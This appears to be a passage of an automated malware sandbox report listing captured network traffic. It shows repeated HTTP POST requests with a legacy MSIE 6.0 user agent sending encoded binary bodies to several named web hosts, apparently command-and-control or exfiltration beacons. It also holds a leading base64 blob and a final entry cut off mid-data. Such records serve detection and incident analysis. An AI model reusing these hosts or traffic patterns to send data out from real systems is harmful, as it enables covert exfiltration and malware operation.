tVQF91uEScYAE2qmcu3JhUQ/Ubrh5bUMv8MOE6EXA3oBOgl0jYpz7BFCzEkP5WbJzn39xejZoWCEpUepvduhvfArhiHB+BTIr4WywQygORFwQWDceaEgGkZf7XSMVAeKhf1uSjs+/bqDh2GVfqoKKyuR9aPiMrvPffqy0A33KiagqnBvfXtpp/c9j9RAMouY99tych2FIP0shmvnXtpD+2YqfMTTRmkzOB13oHsZaPS2v0Wnf2ftr1pIlmWMruUfn2kSOgiVDD/xGgGDjzQLqIHJH2zOxwq8coKHcOJtfLI20nmNN1yF53S1SoX3H5e5I06fkF8+2oHgg8MFmrsEf51T0hzGifX4cJBnj/GigY0W7u7gfcJvRiCds1NXsliSiYeZtL6VRyrnUM5FjD6edhhOwILFcoZDGBrv046ubXV920oGfhMZLZmFwUkY4UeAJEbBOke6Kycjtfc5lSbai1Y4RC2+WbMUls9Ck6hvocltWLtmVOM8RH5e74E+p0eIquq8wZqVgnfdPp/2hEnVKMJTQl9TfQmeGwNHmjcg+zrJRmVmz8fq0LuVaVprV5KBhIBwwT4ei6G7
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 6d 41 72 71 41 56 31 2f 57 73 5a 31 2b 45 36 4c 6c 48 6e 62 7a 5a 61 72 4b 2f 59 4c 30 76 65 78 34 63 55 64 4a 66 2f 55 35 69 4a 6d 37 42 2b 42 70 61 45 32 53 63 67 73 4d 69 67 50 51 41 50 68 59 57 6a 64 42 57 6c 48 65 2b 44 4d 7a 46 79 50 53 59 6f 4e 2b 39 43 6d 61 51 50 78 5a 31 7a 44 74 38 2b 5a 71 37 79 32 32 6c 6b 55 72 53 66 39 33 4f 72 30 56 67 4c 69 34 54 54 78 77 75 73 79 6c 57 61 35 58 44 51 41 35 54 4f 73 58 6d 2b 57 74 46 56 6f 75 47 66 36 52 44 46 68 4b 46 54 30 57 4f 39 34 5a 53 45 46 64 44 71 63 53 70 32 6a 68 78 31 38 43 6c 4a 4d 5a 79 45 69 4c 55 2f 69 73 42 78 49 49 6d 66 47 57 58 6d 75 36 64 35 44 63 38 44 46 70 43 43 4b 4f 34 58 48 59 44 70 6e 76 32 2f 61 52 58 57 48 33 49 36 59 47 42 33 7a 2f 6e 71 59 68 45 6b 5a 58 31 78 46 43 70 45 56 35 78 70 46 71 79 5a 32 62 34 6e 30 68 35 75 59 64 52 71 56 4b 7a 6d 51 6c 47 4b 67 75 72 39 64 51 30 4a 4b 52 53 35 75 66 6a 46 59 31 2f 70 6e 78 61 34 37 2b 74 37 54 49 70 36 44 6e 30 4c 6c 47 55 69 61 48 6e 78 52 64 31 69 4b 61 30 47 43 76 68 38 57 72 43 4c 4b 6c 6a 72 2b 47 45 42 31 55 4f 4e 45 6b 58 54 52 30 41 77 38 41 43 57 67 51 43 6d 41 2b 6c 30 32 4d 7a 35 53 39 45 2b 33 58 64 76 55 56 4b 6a 42 4a 36 50 65 77 43 77 78 2f 63 72 36 2f 79 55 77 61 51 4d 38 71 49 49 75 63 7a 61 64 73 75 6a 62 73 6c 6b 75 78 54 32 54 65 53 5a 37 52 66 42 43 56 7a 69 42 31 47 78 49 32 59 63 57 74 5a 39 41 34 54 71 6a 76 59 4c 66 67 58 63 4d 56 4d 32 75 61 72 76 77 31 2b 53 44 45 4a 49 7a 2b 45 41 62 46 30 31 38 4a 59 4c 6c 33 45 30 30 43 38 77 43 48 4d 49 37 36 5a 6d 74 50 4a 2b 7a 4d 7a 38 49 55 33 6e 45 7a 34 42 67 52 31 4c 48 65 33 72 47 4f 69 77 39 62 6b 75 63 73 51 66 58 45 42 56 35 47 52 72 61 4b 39 56 4f 49 76 2f 6a 30 6a 51 3d Data Ascii: mArqAV1/WsZ1+E6LlHnbzZarK/YL0vex4cUdJf/U5iJm7B+BpaE2ScgsMigPQAPhYWjdBWlHe+DMzFyPSYoN+9CmaQPxZ1zDt8+Zq7y22lkUrSf93Or0VgLi4TTxwusylWa5XDQA5TOsXm+WtFVouGf6RDFhKFT0WO94ZSEFdDqcSp2jhx18ClJMZyEiLU/isBxIImfGWXmu6d5Dc8DFpCCKO4XHYDpnv2/aRXWH3I6YGB3z/nqYhEkZX1xFCpEV5xpFqyZ2b4n0h5uYdRqVKzmQlGKgur9dQ0JKRS5ufjFY1/pnxa47+t7TIp6Dn0LlGUiaHnxRd1iKa0GCvh8WrCLKljr+GEB1UONEkXTR0Aw8ACWgQCmA+l02Mz5S9E+3XdvUVKjBJ6PewCwx/cr6/yUwaQM8qIIuczadsujbslkuxT2TeSZ7RfBCVziB1GxI2YcWtZ9A4TqjvYLfgXcMVM2uarvw1+SDEJIz+EAbF018JYLl3E00C8wCHMI76ZmtPJ+zMz8IU3nEz4BgR1LHe3rGOiw9bkucsQfXEBV5GRraK9VOIv/j0jQ=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 6d 41 72 71 41 56 31 2f 57 73 5a 31 2b 45 36 4c 6c 48 6e 62 7a 5a 61 72 4b 2f 59 4c 30 76 65 78 34 63 55 64 4a 66 2f 55 35 69 4a 6d 37 42 2b 42 70 61 45 32 53 63 67 73 4d 69 67 50 51 41 50 68 59 57 6a 64 42 57 6c 48 65 2b 44 4d 7a 46 79 50 53 59 6f 4e 2b 39 43 6d 61 51 50 78 5a 31 7a 44 74 38 2b 5a 71 37 79 32 32 6c 6b 55 72 53 66 39 33 4f 72 30 56 67 4c 69 34 54 54 78 77 75 73 79 6c 57 61 35 58 44 51 41 35 54 4f 73 58 6d 2b 57 74 46 56 6f 75 47 66 36 52 44 46 68 4b 46 54 30 57 4f 39 34 5a 53 45 46 64 44 71 63 53 70 32 6a 68 78 31 38 43 6c 4a 4d 5a 79 45 69 4c 55 2f 69 73 42 78 49 49 6d 66 47 57 58 6d 75 36 64 35 44 63 38 44 46 70 43 43 4b 4f 34 58 48 59 44 70 6e 76 32 2f 61 52 58 57 48 33 49 36 59 47 42 33 7a 2f 6e 71 59 68 45 6b 5a 58 31 78 46 43 70 45 56 35 78 70 46 71 79 5a 32 62 34 6e 30 68 35 75 59 64 52 71 56 4b 7a 6d 51 6c 47 4b 67 75 72 39 64 51 30 4a 4b 52 53 35 75 66 6a 46 59 31 2f 70 6e 78 61 34 37 2b 74 37 54 49 70 36 44 6e 30 4c 6c 47 55 69 61 48 6e 78 52 64 31 69 4b 61 30 47 43 76 68 38 57 72 43 4c 4b 6c 6a 72 2b 47 45 42 31 55 4f 4e 45 6b 58 54 52 30 41 77 38 41 43 57 67 51 43 6d 41 2b 6c 30 32 4d 7a 35 53 39 45 2b 33 58 64 76 55 56 4b 6a 42 4a 36 50 65 77 43 77 78 2f 63 72 36 2f 79 55 77 61 51 4d 38 71 49 49 75 63 7a 61 64 73 75 6a 62 73 6c 6b 75 78 54 32 54 65 53 5a 37 52 66 42 43 56 7a 69 42 31 47 78 49 32 59 63 57 74 5a 39 41 34 54 71 6a 76 59 4c 66 67 58 63 4d 56 4d 32 75 61 72 76 77 31 2b 53 44 45 4a 49 7a 2b 45 41 62 46 30 31 38 4a 59 4c 6c 33 45 30 30 43 38 77 43 48 4d 49 37 36 5a 6d 74 50 4a 2b 7a 4d 7a 38 49 55 33 6e 45 7a 34 42 67 52 31 4c 48 65 33 72 47 4f 69 77 39 62 6b 75 63 73 51 66 58 45 42 56 35 47 52 72 61 4b 39 56 4f 49 76 2f 6a 30 6a 51 3d Data Ascii: mArqAV1/WsZ1+E6LlHnbzZarK/YL0vex4cUdJf/U5iJm7B+BpaE2ScgsMigPQAPhYWjdBWlHe+DMzFyPSYoN+9CmaQPxZ1zDt8+Zq7y22lkUrSf93Or0VgLi4TTxwusylWa5XDQA5TOsXm+WtFVouGf6RDFhKFT0WO94ZSEFdDqcSp2jhx18ClJMZyEiLU/isBxIImfGWXmu6d5Dc8DFpCCKO4XHYDpnv2/aRXWH3I6YGB3z/nqYhEkZX1xFCpEV5xpFqyZ2b4n0h5uYdRqVKzmQlGKgur9dQ0JKRS5ufjFY1/pnxa47+t7TIp6Dn0LlGUiaHnxRd1iKa0GCvh8WrCLKljr+GEB1UONEkXTR0Aw8ACWgQCmA+l02Mz5S9E+3XdvUVKjBJ6PewCwx/cr6/yUwaQM8qIIuczadsujbslkuxT2TeSZ7RfBCVziB1GxI2YcWtZ9A4TqjvYLfgXcMVM2uarvw1+SDEJIz+EAbF018JYLl3E00C8wCHMI76ZmtPJ+zMz8IU3nEz4BgR1LHe3rGOiw9bkucsQfXEBV5GRraK9VOIv/j0jQ=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 75 71 4f 76 5a 4c 77 45 5a 73 5a 78 5a 66 5a 2f 5a 78 6a 63 61 30 2f 62 66 4e 64 55 65 50 6b 6b 73 41 48 6a 38 51 66 62 79 4b 78 6d 65 4d 44 4f 63 4d 31 2f 6d 44 33 41 45 47 4c 70 5a 4a 47 32 30 75 51 57 42 30 4d 6e 49 46 47 6e 47 73 65 75 50 79 77 61 5a 57 5a 37 41 76 4d 41 43 4f 59 41 36 77 45 56 64 43 6a 77 4e 4f 70 4e 54 55 6a 71 77 79 32 48 62 76 64 4c 61 73 6a 41 6a 64 6f 59 78 49 6e 43 31 43 79 6a 76 6c 36 78 70 35 42 62 69 2f 42 39 44 38 41 48 31 53 69 69 70 33 70 58 79 6c 72 48 63 51 34 67 54 6a 63 72 7a 6d 76 50 34 73 46 4c 76 64 67 33 4f 6a 79 33 52 58 4f 4e 4d 78 56 36 68 53 39 35 2b 62 47 69 63 75 53 33 47 4e 72 54 6a 77 31 6c 68 73 77 39 34 57 44 49 75 4a 63 6c 68 64 37 58 45 76 69 5a 6e 47 33 6b 64 6b 6e 2f 6c 6e 44 76 6d 6e 6c 6e 54 47 73 42 48 45 62 37 74 54 5a 31 52 42 79 36 67 5a 4a 76 37 4c 64 46 2b 68 6e 67 33 6d 56 41 42 54 6d 6b 52 31 53 69 45 50 47 45 71 2b 6b 43 4a 6c 77 67 33 75 49 5a 75 65 51 6c 62 4c 32 65 68 61 32 6d 68 65 6d 72 66 37 37 74 51 4e 33 57 75 55 2b 4b 4d 2f 6d 42 4d 6a 59 63 34 78 76 76 69 71 6d 4e 79 61 72 48 46 52 72 46 61 48 69 43 5a 4e 58 65 72 69 56 56 74 4b 64 2f 6f 44 56 67 65 67 68 71 46 6d 62 78 4a 78 57 42 6f 43 53 6c 31 31 56 53 38 54 6c 48 78 66 69 5a 6f 34 4c 2f 4c 55 71 6b 51 33 35 33 71 72 63 57 43 42 51 57 37 39 4e 5a 2b 47 5a 6f 32 37 6e 30 78 75 53 65 53 36 79 54 64 71 4c 50 6b 49 54 62 33 33 41 44 7a 68 74 75 4c 44 32 37 62 65 4f 32 63 77 36 61 75 73 52 50 62 31 5a 47 54 37 34 4d 67 73 70 77 6e 47 47 62 75 55 6b 51 4c 76 73 4c 2f 6f 51 54 36 66 68 65 77 55 33 41 4e 2f 45 5a 68 5a 2f 4f 42 59 48 68 5a 63 4b 39 52 4f 72 48 6b 38 45 7a 65 48 77 3d Data Ascii: uqOvZLwEZsZxZfZ/Zxjca0/bfNdUePkksAHj8QfbyKxmeMDOcM1/mD3AEGLpZJG20uQWB0MnIFGnGseuPywaZWZ7AvMACOYA6wEVdCjwNOpNTUjqwy2HbvdLasjAjdoYxInC1Cyjvl6xp5Bbi/B9D8AH1Siip3pXylrHcQ4gTjcrzmvP4sFLvdg3Ojy3RXONMxV6hS95+bGicuS3GNrTjw1lhsw94WDIuJclhd7XEviZnG3kdkn/lnDvmnlnTGsBHEb7tTZ1RBy6gZJv7LdF+hng3mVABTmkR1SiEPGEq+kCJlwg3uIZueQlbL2eha2mhemrf77tQN3WuU+KM/mBMjYc4xvviqmNyarHFRrFaHiCZNXeriVVtKd/oDVgeghqFmbxJxWBoCSl11VS8TlHxfiZo4L/LUqkQ353qrcWCBQW79NZ+GZo27n0xuSeS6yTdqLPkITb33ADzhtuLD27beO2cw6ausRPb1ZGT74MgspwnGGbuUkQLvsL/oQT6fhewU3AN/EZhZ/OBYHhZcK9ROrHk8EzeHw=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 75 71 4f 76 5a 4c 77 45 5a 73 5a 78 5a 66 5a 2f 5a 78 6a 63 61 30 2f 62 66 4e 64 55 65 50 6b 6b 73 41 48 6a 38 51 66 62 79 4b 78 6d 65 4d 44 4f 63 4d 31 2f 6d 44 33 41 45 47 4c 70 5a 4a 47 32 30 75 51 57 42 30 4d 6e 49 46 47 6e 47 73 65 75 50 79 77 61 5a 57 5a 37 41 76 4d 41 43 4f 59 41 36 77 45 56 64 43 6a 77 4e 4f 70 4e 54 55 6a 71 77 79 32 48 62 76 64 4c 61 73 6a 41 6a 64 6f 59 78 49 6e 43 31 43 79 6a 76 6c 36 78 70 35 42 62 69 2f 42 39 44 38 41 48 31 53 69 69 70 33 70 58 79 6c 72 48 63 51 34 67 54 6a 63 72 7a 6d 76 50 34 73 46 4c 76 64 67 33 4f 6a 79 33 52 58 4f 4e 4d 78 56 36 68 53 39 35 2b 62 47 69 63 75 53 33 47 4e 72 54 6a 77 31 6c 68 73 77 39 34 57 44 49 75 4a 63 6c 68 64 37 58 45 76 69 5a 6e 47 33 6b 64 6b 6e 2f 6c 6e 44 76 6d 6e 6c 6e 54 47 73 42 48 45 62 37 74 54 5a 31 52 42 79 36 67 5a 4a 76 37 4c 64 46 2b 68 6e 67 33 6d 56 41 42 54 6d 6b 52 31 53 69 45 50 47 45 71 2b 6b 43 4a 6c 77 67 33 75 49 5a 75 65 51 6c 62 4c 32 65 68 61 32 6d 68 65 6d 72 66 37 37 74 51 4e 33 57 75 55 2b 4b 4d 2f 6d 42 4d 6a 59 63 34 78 76 76 69 71 6d 4e 79 61 72 48 46 52 72 46 61 48 69 43 5a 4e 58 65 72 69 56 56 74 4b 64 2f 6f 44 56 67 65 67 68 71 46 6d 62 78 4a 78 57 42 6f 43 53 6c 31 31 56 53 38 54 6c 48 78 66 69 5a 6f 34 4c 2f 4c 55 71 6b 51 33 35 33 71 72 63 57 43 42 51 57 37 39 4e 5a 2b 47 5a 6f 32 37 6e 30 78 75 53 65 53 36 79 54 64 71 4c 50 6b 49 54 62 33 33 41 44 7a 68 74 75 4c 44 32 37 62 65 4f 32 63 77 36 61 75 73 52 50 62 31 5a 47 54 37 34 4d 67 73 70 77 6e 47 47 62 75 55 6b 51 4c 76 73 4c 2f 6f 51 54 36 66 68 65 77 55 33 41 4e 2f 45 5a 68 5a 2f 4f 42 59 48 68 5a 63 4b 39 52 4f 72 48 6b 38 45 7a 65 48 77 3d Data Ascii: uqOvZLwEZsZxZfZ/Zxjca0/bfNdUePkksAHj8QfbyKxmeMDOcM1/mD3AEGLpZJG20uQWB0MnIFGnGseuPywaZWZ7AvMACOYA6wEVdCjwNOpNTUjqwy2HbvdLasjAjdoYxInC1Cyjvl6xp5Bbi/B9D8AH1Siip3pXylrHcQ4gTjcrzmvP4sFLvdg3Ojy3RXONMxV6hS95+bGicuS3GNrTjw1lhsw94WDIuJclhd7XEviZnG3kdkn/lnDvmnlnTGsBHEb7tTZ1RBy6gZJv7LdF+hng3mVABTmkR1SiEPGEq+kCJlwg3uIZueQlbL2eha2mhemrf77tQN3WuU+KM/mBMjYc4xvviqmNyarHFRrFaHiCZNXeriVVtKd/oDVgeghqFmbxJxWBoCSl11VS8TlHxfiZo4L/LUqkQ353qrcWCBQW79NZ+GZo27n0xuSeS6yTdqLPkITb33ADzhtuLD27beO2cw6ausRPb1ZGT74MgspwnGGbuUkQLvsL/oQT6fhewU3AN/EZhZ/OBYHhZcK9ROrHk8EzeHw=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 41 70 56 4b 4b 77 37 49 64 4d 62 32 79 54 71 55 6d 62 42 77 59 58 46 41 58 55 63 4f 6d 35 4f 42 49 75 46 42 67 50 6f 6e 67 50 49 37 64 44 7a 38 39 48 68 39 47 58 7a 48 58 69 6c 56 31 36 34 76 52 2b 77 34 64 55 4e 66 48 53 76 36 78 53 7a 45 4d 64 64 54 73 79 76 57 4f 30 63 58 38 74 63 4a 69 4d 4a 31 32 59 70 6a 72 56 4c 58 55 6f 55 6b 73 30 35 57 75 33 4b 63 4f 43 38 64 36 74 52 7a 54 6e 67 6b 78 41 4b 43 78 79 58 5a 41 6e 57 4e 70 34 44 73 77 72 76 71 59 47 55 34 35 6e 41 4a 38 30 71 4d 6d 77 54 6f 62 62 42 65 6f 48 64 33 42 6e 6e 4c 2b 57 4f 4c 66 52 39 6c 37 2b 61 55 41 41 6c 75 33 31 66 75 4f 79 58 75 2f 71 74 6a 38 58 39 45 4f 46 71 43 44 51 79 55 43 43 49 46 46 4f 48 79 4f 68 75 71 33 4d 45 34 77 42 69 30 71 32 53 63 74 6a 37 45 76 56 50 31 75 65 6e 76 69 34 66 35 5a 72 68 74 7a 2b 31 46 4c 4f 75 53 4b 51 75 62 4a 33 72 4f 56 6b 66 4e 52 69 49 68 50 79 2b 30 2b 59 69 77 43 78 73 39 57 51 68 58 6d 6b 4b 6f 79 57 37 54 70 7a 43 48 32 2f 50 44 68 31 43 30 54 56 41 4b 64 68 37 48 46 65 7a 6c 66 42 73 70 6a 32 64 4d 2b 68 48 4b 4b 2b 4e 57 65 75 31 79 59 57 49 4e 75 2f 69 55 69 50 6a 74 71 66 50 67 36 4e 32 55 38 58 33 31 4d 56 4a 6b 35 41 30 32 65 42 72 44 67 49 43 79 41 50 76 33 31 54 36 43 34 46 46 61 58 7a 6d 58 71 5a 48 6a 46 57 4d 64 58 38 4e 77 53 46 50 66 42 4a 59 37 4b 42 32 4a 44 39 75 4f 48 4f 62 39 51 73 35 79 6e 71 76 70 4a 59 35 59 4c 64 7a 62 6f 72 45 54 41 6f 68 31 38 65 69 46 78 68 67 73 46 56 73 59 71 6e 50 69 47 69 53 72 2b 48 72 2f 35 6b 4d 30 66 38 38 72 42 5a 36 62 70 7a 75 43 6c 56 33 76 74 38 4f 6e 7a 64 31 48 72 6c 37 78 2f 36 48 75 4d 30 70 43 7a 42 6c 5a 2b 6b 31 2b 6d 78 73 4d 6a 48 59 62 55 57 34 4b 78 4a 4f 6d 54 38 46 32 68 48 55 70 47 71 4a 63 76 4b 4f 75 7a 6e 73 4e 56 31 51 4f 74 43 76 35 43 4a 33 4e 42 55 45 4e 66 64 4b 69 4c 48 68 75 52 51 3d 3d Data Ascii: ApVKKw7IdMb2yTqUmbBwYXFAXUcOm5OBIuFBgPongPI7dDz89Hh9GXzHXilV164vR+w4dUNfHSv6xSzEMddTsyvWO0cX8tcJiMJ12YpjrVLXUoUks05Wu3KcOC8d6tRzTngkxAKCxyXZAnWNp4DswrvqYGU45nAJ80qMmwTobbBeoHd3BnnL+WOLfR9l7+aUAAlu31fuOyXu/qtj8X9EOFqCDQyUCCIFFOHyOhuq3ME4wBi0q2Sctj7EvVP1uenvi4f5Zrhtz+1FLOuSKQubJ3rOVkfNRiIhPy+0+YiwCxs9WQhXmkKoyW7TpzCH2/PDh1C0TVAKdh7HFezlfBspj2dM+hHKK+NWeu1yYWINu/iUiPjtqfPg6N2U8X31MVJk5A02eBrDgICyAPv31T6C4FFaXzmXqZHjFWMdX8NwSFPfBJY7KB2JD9uOHOb9Qs5ynqvpJY5YLdzborETAoh18eiFxhgsFVsYqnPiGiSr+Hr/5kM0f88rBZ6bpzuClV3vt8Onzd1Hrl7x/6HuM0pCzBlZ+k1+mxsMjHYbUW4KxJOmT8F2hHUpGqJcvKOuznsNV1QOtCv5CJ3NBUENfdKiLHhuRQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vitaindu.comCache-Control: no-cacheData Raw: 33 44 57 30 5a 4f 63 45 5a 73 61 38 2f 4d 67 62 6c 6a 30 67 63 4c 42 72 39 4c 31 64 76 7a 32 57 43 79 39 64 69 52 73 51 78 49 6a 75 4f 39 41 55 6c 4b 6b 35 78 56 6f 41 77 54 53 69 32 73 47 7a 4c 38 6b 64 49 74 72 74 33 37 57 67 55 46 36 41 75 6e 79 33 56 42 66 64 52 35 58 79 7a 2f 65 4f 61 66 6d 4a 36 6f 4d 66 5a 4a 49 61 4d 55 4f 35 79 65 7a 70 75 5a 73 30 6a 68 67 6a 48 42 49 59 64 4a 32 76 63 75 4c 46 58 49 69 39 70 44 33 52 42 35 73 63 52 61 55 45 38 57 62 6e 2b 74 36 35 79 70 39 30 44 67 4f 55 6d 46 76 4c 45 4f 67 43 67 62 6d 30 47 35 63 46 4c 59 55 36 30 56 65 6c 45 44 44 50 31 66 42 5a 31 5a 7a 76 73 6e 43 32 51 67 64 66 51 70 39 49 4b 55 66 53 79 62 6e 33 31 43 51 76 78 6b 62 65 4d 68 52 47 37 72 37 30 39 32 6c 46 65 4d 6e 4b 2b 6f 33 78 59 33 6c 59 73 6f 52 36 50 56 41 67 69 49 71 62 4b 52 73 64 68 50 42 56 65 73 6b 45 59 42 7a 6e 67 30 77 55 53 49 57 32 58 56 45 2f 62 6e 34 39 6a 34 2b 6b 70 75 67 43 75 42 56 5a 43 52 47 4c 6b 76 6c 56 5a 41 4a 2f 76 75 33 6c 38 51 50 38 6b 39 4a 42 4c 4f 55 32 2f 61 64 65 71 2b 56 64 64 43 69 74 31 70 46 41 38 65 38 47 4f 77 33 58 4a 6e 36 71 44 35 71 72 32 50 6f 68 68 69 46 35 69 57 70 63 71 7a 38 59 53 72 6c 70 6b 33 53 44 35 52 50 6b 34 45 4f 61 4c 30 78 36 34 35 66 56 50 45 48 35 77 55 79 37 2b 35 61 6a 2f 42 4d 49 68 54 50 51 6b 6e 46 30 4a 39 4a 49 59 63 36 75 4a 54 58 74 53 42 62 78 78 4a 46 6a 46 56 38 5a 7a 74 54 78 66 64 55 4b 4b 58 7a 78 6b 71 4d 5a 51 49 6e 37 69 47 72 55 2b 5a 77 70 4c 32 6c 6c 4a 58 69 51 34 43 45 36 71 4d 63 68 48 54 50 48 36 34 41 47 48 4e 30 64 32 58 4d 6b 57 58 55 7a 4d 62 48 41 49 4d 64 4b 4b 6f 37 56 7a 62 47 48 56 62 6f 51 4d 75 52 4e 51 76 76 42 68 50 58 53 4b 35 63 59 35 67 4d 65 33 52 31 35 6a 64 2b 5a 48 50 79 30 4a 4c 42 5a 57 36 6e 79 52 2b 36 4a 68 4d 65 48 71 31 44 31 Data Ascii: 3DW0ZOcEZsa8/Mgblj0gcLBr9L1dvz2WCy9diRsQxIjuO9AUlKk5xVoAwTSi2sGzL8kdItrt37WgUF6Auny3VBfdR5Xyz/eOafmJ6oMfZJIaMUO5yezpuZs0jhgjHBIYdJ2vcuLFXIi9pD3RB5scRaUE8Wbn+t65yp90DgOUmFvLEOgCgbm0G5cFLYU60VelEDDP1fBZ1ZzvsnC2QgdfQp9IKUfSybn31CQvxkbeMhRG7r7092lFeMnK+o3xY3lYsoR6PVAgiIqbKRsdhPBVeskEYBzng0wUSIW2XVE/bn49j4+kpugCuBVZCRGLkvlVZAJ/vu3l8QP8k9JBLOU2/adeq+VddCit1pFA8e8GOw3XJn6qD5qr2PohhiF5iWpcqz8YSrlpk3SD5RPk4EOaL0x645fVPEH5wUy7+5aj/BMIhTPQknF0J9JIYc6uJTXtSBbxxJFjFV8ZztTxfdUKKXzxkqMZQIn7iGrU+ZwpL2llJXiQ4CE6qMchHTPH64AGHN0d2XMkWXUzMbHAIMdKKo7VzbGHVboQMuRNQvvBhPXSK5cY5gMe3R15jd+ZHPy0JLBZW6nyR+6JhMeHq1D1
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 61 77 6a 59 71 53 72 6b 65 4d 62 6b 61 73 6c 4a 44 55 57 56 77 2b 33 69 54 57 35 61 44 77 33 56 2f 74 41 75 66 51 71 65 4e 35 70 6a 4a 36 4a 34 36 5a 47 39 30 32 4a 45 4e 33 74 71 38 69 2f 37 63 62 4d 45 4a 35 34 34 51 50 59 41 54 7a 58 57 74 6a 4b 47 39 79 48 55 5a 6b 46 4f 63 70 2b 39 36 59 5a 36 57 49 6f 66 36 75 59 6d 31 33 46 75 43 4d 44 61 58 62 49 62 2f 64 6d 4a 69 33 76 34 51 4f 68 47 45 56 48 56 34 44 75 31 2f 43 6f 7a 4f 4a 6a 38 62 32 56 63 2b 78 54 68 6f 46 72 2f 4a 32 66 66 36 79 33 5a 4a 2b 35 76 66 2b 32 79 4b 58 6a 42 4a 71 6b 53 6d 6c 64 6f 36 56 4d 67 62 47 6e 6f 61 4c 30 49 46 6b 63 71 4e 44 77 49 76 76 6b 57 5a 37 4c 35 71 38 49 4c 39 52 50 33 32 48 62 76 74 39 56 57 5a 4f 61 48 4e 56 79 41 4c 36 63 36 39 33 72 75 49 42 79 48 61 4d 59 76 4e 55 76 4c 56 6c 72 6c 56 49 79 37 38 36 59 6d 74 4b 47 4a 49 53 2f 4b 2b 46 75 50 6b 48 68 66 50 6b 2b 43 71 7a 41 75 75 31 76 6b 43 50 32 78 66 57 48 72 36 4a 6a 69 64 33 62 34 6a 73 4e 51 67 41 66 4b 39 75 6a 7a 34 66 75 38 48 6f 6c 2f 49 47 44 51 37 32 42 44 37 51 37 39 39 30 36 2b 5a 47 4e 71 36 73 42 47 2f 69 32 45 46 47 39 34 58 64 42 66 79 4e 4b 74 30 69 64 65 75 35 31 54 71 71 7a 45 67 57 57 79 6f 57 63 4c 6b 49 63 64 4c 50 44 33 44 6f 52 67 79 72 79 6c 7a 65 31 49 78 49 72 6d 6f 37 6b 39 43 44 57 36 4d 4b 73 68 56 57 38 71 4a 45 73 6f 6e 58 51 4f 71 43 47 31 6c 58 68 35 68 44 68 77 53 72 53 6f 4f 66 59 65 54 65 6a 6a 4e 50 44 37 66 78 70 51 37 47 75 4a 48 75 4d 35 4d 6d 44 4f 69 48 68 79 6a 59 70 78 49 67 45 78 33 70 6e 61 79 48 6c 4c 69 33 4c 52 58 61 32 73 6e 4c 54 39 48 53 53 39 45 4f 63 2b 49 78 69 71 2f 71 51 4d 58 73 78 66 31 2f 44 43 58 69 4b 63 31 33 38 7a 64 4f 4c 49 30 4b 57 41 41 6c 59 74 7a 34 42 47 5a 74 62 66 2b 4f 45 4e 69 78 79 45 75 78 79 61 4c 30 2f 52 2b 51 3d 3d Data Ascii: awjYqSrkeMbkaslJDUWVw+3iTW5aDw3V/tAufQqeN5pjJ6J46ZG902JEN3tq8i/7cbMEJ544QPYATzXWtjKG9yHUZkFOcp+96YZ6WIof6uYm13FuCMDaXbIb/dmJi3v4QOhGEVHV4Du1/CozOJj8b2Vc+xThoFr/J2ff6y3ZJ+5vf+2yKXjBJqkSmldo6VMgbGnoaL0IFkcqNDwIvvkWZ7L5q8IL9RP32Hbvt9VWZOaHNVyAL6c693ruIByHaMYvNUvLVlrlVIy786YmtKGJIS/K+FuPkHhfPk+CqzAuu1vkCP2xfWHr6Jjid3b4jsNQgAfK9ujz4fu8Hol/IGDQ72BD7Q79906+ZGNq6sBG/i2EFG94XdBfyNKt0ideu51TqqzEgWWyoWcLkIcdLPD3DoRgyrylze1IxIrmo7k9CDW6MKshVW8qJEsonXQOqCG1lXh5hDhwSrSoOfYeTejjNPD7fxpQ7GuJHuM5MmDOiHhyjYpxIgEx3pnayHlLi3LRXa2snLT9HSS9EOc+Ixiq/qQMXsxf1/DCXiKc138zdOLI0KWAAlYtz4BGZtbf+OENixyEuxyaL0/R+Q==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 68 44 52 7a 35 78 65 55 63 73 61 61 4a 5a 4e 31 42 71 4b 41 62 57 41 79 4e 4f 78 4e 5a 74 57 2f 4f 31 46 65 51 37 53 6b 4d 6c 70 77 64 79 63 71 66 54 44 42 32 33 4c 72 31 48 55 4d 70 45 45 6c 62 49 75 71 38 46 61 67 68 46 6a 50 36 78 5a 68 57 57 53 6d 68 65 34 65 63 73 6b 68 4f 31 46 39 46 55 70 4a 61 4d 30 54 76 41 44 30 38 76 39 41 2f 54 54 66 5a 64 33 56 58 53 72 61 38 69 2b 35 70 71 41 4d 6e 48 68 66 47 4a 69 54 70 49 2f 55 43 5a 37 2b 2f 37 54 41 35 6b 6e 44 39 73 6e 31 72 7a 4f 32 